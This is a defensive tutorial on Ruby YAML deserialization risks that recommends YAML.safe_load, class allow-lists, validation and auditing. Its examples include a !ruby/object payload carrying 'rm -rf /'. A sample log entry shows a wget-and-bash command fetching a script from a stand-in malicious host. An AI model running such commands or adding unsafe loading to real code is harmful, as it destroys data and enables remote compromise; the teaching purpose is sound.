Mitigating Unsafe YAML Loading That Allows Remote Code Execution in Custom Ruby Implementations

Understanding the Vulnerability: `YAML.load` and Arbitrary Code Execution

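The `YAML.load` method in Ruby presents a significant security risk when used with untrusted input. Ruby's YAML library, Psych (`YAML` is an alias for `Psych`), supports Ruby-specific tags such as `!ruby/object:ClassName` that tell the loader to revive an instance of a named class. In Psych versions before 4.0 (bundled with Ruby 3.0 and earlier), `YAML.load` honors these tags for any class loaded in the process. Psych does not call `initialize` when reviving an object: it allocates the instance and then either calls the object's `init_with` method, if the class defines one, or sets its instance variables from the YAML mapping. An attacker who controls the class and its state can pick classes whose methods do something dangerous when invoked during or after loading, which is how crafted payloads lead to arbitrary Ruby code execution on the server. Since Psych 4.0 (Ruby 3.1), `YAML.load` is restricted by default and the old behavior is available as `YAML.unsafe_load`.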

Consider a scenario where your application accepts a configuration file or user-submitted data in YAML format and processes it using `YAML.load`. If this input is not rigorously validated or sanitized, an attacker could provide a payload like the following:

Malicious YAML Payload Example

This payload targets an unrestricted `YAML.load`, or `YAML.load_file`, which reads a file and loads it the same way. It asks the loader to revive an instance of a class whose state the attacker controls, with the aim of running a system command such as `ls` or `rm -rf /`.

# Simplified example. Real-world exploits are usually more complex and chain
# together classes that already exist in the application or its gems.
# `SystemCommand` is a hypothetical class, assumed to be defined as:
#
# class SystemCommand
#   # Psych calls init_with (when defined) while reviving the object.
#   def init_with(coder)
#     system(coder['command'])
#   end
# end
#
# Psych's tag for Ruby objects is written with a single `!`.
--- !ruby/object:SystemCommand
command: "echo 'PWNED' >> /tmp/hacked.txt"

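When an unrestricted `YAML.load` encounters `!ruby/object:SystemCommand`, it allocates a `SystemCommand` instance without calling `initialize`. It then hands the mapping to the object's `init_with` method if one is defined, or otherwise copies each key into an instance variable (`@command` here). If `SystemCommand`, or any code that later touches the revived object, executes the attacker-supplied command, arbitrary code execution is achieved.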
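The revival mechanics can be observed safely with a harmless class. The following is a minimal sketch: `Probe` and `load_unrestricted` are hypothetical names introduced only for this illustration, and the helper falls back to `YAML.load` on Psych versions that predate `YAML.unsafe_load`.

```ruby
require 'yaml'

# Hypothetical class used only to observe how Psych revives objects.
class Probe
  attr_reader :command, :initialized

  def initialize(command)
    @initialized = true
    @command = command
  end
end

# Hypothetical helper: picks the unrestricted loader for the running Psych.
# Psych 4+ (Ruby 3.1+) restricts YAML.load, so YAML.unsafe_load is used there.
def load_unrestricted(yaml)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(yaml) : YAML.load(yaml)
end

payload = "--- !ruby/object:Probe\ncommand: echo hello\n"
obj = load_unrestricted(payload)

puts obj.class               # the revived object is a Probe
puts obj.command             # @command was set straight from the YAML mapping
puts obj.initialized.inspect # nil, because initialize never ran
```

The attacker-chosen value ends up in `@command` even though the constructor was never invoked, which is why defensive checks placed in `initialize` do not protect deserialized objects.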

Mitigation Strategy 1: Prefer `YAML.safe_load`

The most direct and recommended mitigation is to use `YAML.safe_load` instead of `YAML.load`. `YAML.safe_load` restricts the types of objects that can be deserialized, preventing the instantiation of arbitrary Ruby classes and thus blocking code execution vectors. By default it only allows basic types: strings, integers, floats, booleans, `nil`, arrays, and hashes. Other types, including symbols and dates, are rejected unless explicitly permitted.

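`YAML` is an alias for `Psych`, the YAML library bundled with Ruby, so `YAML.safe_load` and `Psych.safe_load` are the same method. On Ruby 3.1 and later (Psych 4.0+), plain `YAML.load` is also restricted by default, and `YAML.unsafe_load` is the unrestricted variant. If you are using an older version or a different YAML parser, ensure you are using its equivalent safe loading function.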
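As a rough illustration of the default restrictions, the sketch below loads a document made of basic types and then checks that three other kinds of input are refused. The `rejected?` helper is a hypothetical name used only here.

```ruby
require 'yaml'

# Basic types load without any extra options.
plain = YAML.safe_load("name: app\nports: [80, 443]\ndebug: false\n")
puts plain.inspect

# Hypothetical helper: true when safe_load refuses the document.
def rejected?(yaml)
  YAML.safe_load(yaml)
  false
rescue Psych::DisallowedClass
  true
end

puts rejected?("--- :a_symbol\n")                   # Symbol is not permitted by default
puts rejected?("--- 2024-01-01\n")                  # Date is not permitted by default
puts rejected?("--- !ruby/object:Object\nx: 1\n")   # arbitrary Ruby objects are refused
```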

Implementing `YAML.safe_load`

Replace all instances of `YAML.load` with `YAML.safe_load` in your codebase. For example:

Before (Vulnerable)

require 'yaml'

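# Malicious payload; SystemCommand is a hypothetical class defined by the application.
untrusted_yaml_data = "--- !ruby/object:SystemCommand\ncommand: 'rm -rf /'\n"

# This is DANGEROUS on Psych < 4 (Ruby 3.0 and earlier), where YAML.load revives
# arbitrary objects. YAML.unsafe_load behaves the same way on newer versions.
data = YAML.load(untrusted_yaml_data)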

After (Safe)

require 'yaml'

# Malicious payload; SystemCommand is a hypothetical class defined by the application.
untrusted_yaml_data = "--- !ruby/object:SystemCommand\ncommand: 'rm -rf /'\n"

# This is SAFE: the Ruby object tag is not permitted, so safe_load raises
# Psych::DisallowedClass instead of reviving the object.
# This is the desired behavior for security.
data = YAML.safe_load(untrusted_yaml_data)

If `YAML.safe_load` raises `Psych::DisallowedClass` (a type outside the permitted set) or `Psych::BadAlias` (an alias when aliases are disabled), this is a strong indicator that the input is malicious or malformed. Log these errors and reject the input.
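One way to centralize this handling is a small wrapper around `YAML.safe_load`. The following is a sketch, not a definitive implementation: `parse_untrusted_yaml` is a hypothetical helper name, and `warn` stands in for whatever logger the application uses.

```ruby
require 'yaml'

# Hypothetical helper: returns the parsed data, or nil when the input is rejected.
def parse_untrusted_yaml(text)
  YAML.safe_load(text)
rescue Psych::DisallowedClass, Psych::BadAlias => e
  # Disallowed types or aliases: treat as a possible attack attempt.
  warn "Rejected YAML (disallowed content): #{e.class}: #{e.message}"
  nil
rescue Psych::SyntaxError => e
  # Malformed input.
  warn "Rejected YAML (syntax error): #{e.message}"
  nil
end

puts parse_untrusted_yaml("a: 1\n").inspect
puts parse_untrusted_yaml("--- !ruby/object:EvilClass\ncommand: ls\n").inspect
puts parse_untrusted_yaml("a: &x [1]\nb: *x\n").inspect
```

Returning `nil` keeps the sketch short. If an empty document (which also parses to `nil`) must be distinguished from rejected input, raising an application-specific error would be a reasonable alternative.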

Mitigation Strategy 2: Whitelisting Allowed Types (If `safe_load` is Insufficient)

In some advanced scenarios, you might need to deserialize specific custom Ruby objects from YAML. While `YAML.safe_load` is the primary defense, if you absolutely must allow certain custom types, you can configure `YAML.safe_load` to permit only a specific whitelist of classes. This is done using the `permitted_classes` keyword argument, available in Psych 3.1 and later.

Configuring `permitted_classes`

Let’s say you have a `Configuration` class that you trust and want to allow deserialization for:

require 'yaml'

class Configuration
  attr_accessor :setting1, :setting2

  # Not called by Psych: the loader allocates the object and sets
  # @setting1 and @setting2 directly from the YAML mapping.
  def initialize(setting1, setting2)
    @setting1 = setting1
    @setting2 = setting2
  end
end

# Example of trusted YAML (Psych's Ruby object tag uses a single `!`)
trusted_yaml = "--- !ruby/object:Configuration\nsetting1: value1\nsetting2: value2\n"

# Using safe_load with permitted_classes
# Note: The class must be defined *before* calling safe_load if it's not a standard type.
data = YAML.safe_load(trusted_yaml, permitted_classes: [Configuration], aliases: true)

puts data.setting1 # Output: value1
puts data.setting2 # Output: value2

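The `aliases: true` option is only needed when the document uses YAML anchors and aliases (`&name` and `*name`). The example above does not, so the option could be dropped there. Leave aliases disabled for untrusted input unless you genuinely need them, because heavily nested aliases can be used to make a small document expand into a very large structure. Always be extremely cautious when whitelisting classes. The fewer classes you permit, the smaller your attack surface.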
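The allow-list applies per class, so anything not listed is still refused. The sketch below illustrates this with two hypothetical classes, `AppSettings` (permitted) and `Unlisted` (not permitted); both names are assumptions made for the example.

```ruby
require 'yaml'

# Hypothetical class the application trusts.
class AppSettings
  attr_reader :name
end

# Hypothetical class that is deliberately left off the allow-list.
class Unlisted
end

allowed = [AppSettings]

# A permitted class is revived as usual.
ok = YAML.safe_load("--- !ruby/object:AppSettings\nname: demo\n",
                    permitted_classes: allowed)
puts ok.name

# Any other class still raises Psych::DisallowedClass.
rejected = begin
  YAML.safe_load("--- !ruby/object:Unlisted\nname: demo\n",
                 permitted_classes: allowed)
  false
rescue Psych::DisallowedClass
  true
end
puts rejected
```

Keeping the list in one constant or variable, as with `allowed` here, makes it easier to review exactly which classes the application is willing to revive.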

Mitigation Strategy 3: Input Validation and Sanitization

Even with `YAML.safe_load`, robust input validation and sanitization are crucial layers of defense. If your application expects specific keys and value types within the YAML structure, validate them rigorously *after* deserialization. This prevents unexpected data from being processed, even if it doesn’t lead to immediate code execution.

Post-Deserialization Validation Example

Suppose your YAML should only contain `host` and `port` for a database connection:

require 'yaml'

# Potentially malicious input, but safe_load will prevent direct RCE
# This example shows how to validate the *structure* and *content*
# even if safe_load allows basic types.
untrusted_yaml_data = <<~YAML
database:
  host: "localhost"
  port: 5432
  # attacker might add:
  # admin_command: "rm -rf /"
YAML

begin
  # Use safe_load first; aliases stay disabled because this input does not need them
  config = YAML.safe_load(untrusted_yaml_data)

  # Now, validate the structure and content
  if config.nil? || !config.is_a?(Hash)
    raise "Invalid YAML structure: root is not a hash."
  end

  db_config = config['database']
  if db_config.nil? || !db_config.is_a?(Hash)
    raise "Invalid YAML structure: 'database' section missing or not a hash."
  end

  host = db_config['host']
  port = db_config['port']

  if host.nil? || !host.is_a?(String)
    raise "Invalid database host: missing or not a string."
  end

  if port.nil? || !port.is_a?(Integer)
    raise "Invalid database port: missing or not an integer."
  end

  # Check for unexpected keys that might indicate an attempted exploit
  unexpected_keys = db_config.keys - ['host', 'port']
  if unexpected_keys.any?
    # Kernel#warn writes to stderr; substitute your application's logger here.
    warn("Unexpected keys found in database config: #{unexpected_keys.join(', ')}")
    # Depending on policy, you might reject the entire config here
    # raise "Unexpected configuration keys found."
  end

  puts "Database Host: #{host}"
  puts "Database Port: #{port}"

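rescue Psych::SyntaxError => e
  puts "YAML Syntax Error: #{e.message}"
  # Log and reject
rescue Psych::DisallowedClass, Psych::BadAlias => e
  puts "Disallowed YAML content: #{e.message}"
  # Log and reject; this may indicate an attempted attack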
rescue StandardError => e
  puts "Configuration Error: #{e.message}"
  # Log and reject
end

This layered approach means that data which parses safely but does not match the expected shape is still caught before the application acts on it. Validation runs only after parsing, so it complements `YAML.safe_load` rather than replacing it.

Auditing and Monitoring

Regularly audit your codebase for any remaining uses of `YAML.load`, `YAML.load_file`, and `YAML.unsafe_load` (and their `Psych.` equivalents) on untrusted input. Implement logging for any YAML parsing errors, especially those raised by `YAML.safe_load` that indicate unexpected types or structures. Monitoring these logs can help detect attempted attacks as they happen.
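A simple text scan can serve as a starting point for such an audit. The following is a rough sketch: `RISKY_CALL` and `risky_yaml_calls` are hypothetical names, and the pattern only catches direct calls on `YAML` or `Psych`, so it will miss indirect uses and may flag calls that only ever see trusted input.

```ruby
# Matches YAML.load, YAML.load_file, YAML.unsafe_load and the Psych equivalents,
# but not YAML.safe_load.
RISKY_CALL = /\b(?:YAML|Psych)\.(?:load|load_file|unsafe_load|unsafe_load_file)\b/

# Hypothetical helper: returns [line_number, stripped_line] pairs for risky calls.
def risky_yaml_calls(source)
  source.each_line.with_index(1)
        .select { |line, _number| line.match?(RISKY_CALL) }
        .map { |line, number| [number, line.strip] }
end

# Illustrative input; in practice the source would come from File.read.
sample = <<~RUBY
  config = YAML.load(File.read(path))
  safe = YAML.safe_load(text)
  other = Psych.load_file('settings.yml')
RUBY

risky_yaml_calls(sample).each do |number, line|
  puts "line #{number}: #{line}"
end
```

To cover a project, the same helper could be applied to each file returned by `Dir.glob('**/*.rb')`. Each hit still needs manual review to decide whether the input is actually untrusted.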

Example Log Entry for a Failed Safe Load

[YYYY-MM-DD HH:MM:SS] WARN: YAML parsing error for input from IP 192.168.1.100.
Error: Psych::DisallowedClass: Tried to load unspecified class: EvilClass
Input snippet: --- !ruby/object:EvilClass
  command: "wget http://malicious.com/payload.sh -O /tmp/payload.sh; bash /tmp/payload.sh"
User Agent: Mozilla/5.0 ...
Request Path: /api/upload_config

This kind of log entry is a critical alert. It shows that someone tried to inject a dangerous YAML structure and that `YAML.safe_load` rejected it.

Conclusion

The `YAML.load` vulnerability is a classic example of insecure deserialization. By consistently using `YAML.safe_load`, employing strict whitelisting when necessary, and implementing comprehensive post-deserialization validation, you can effectively mitigate the risk of remote code execution in your custom Ruby implementations.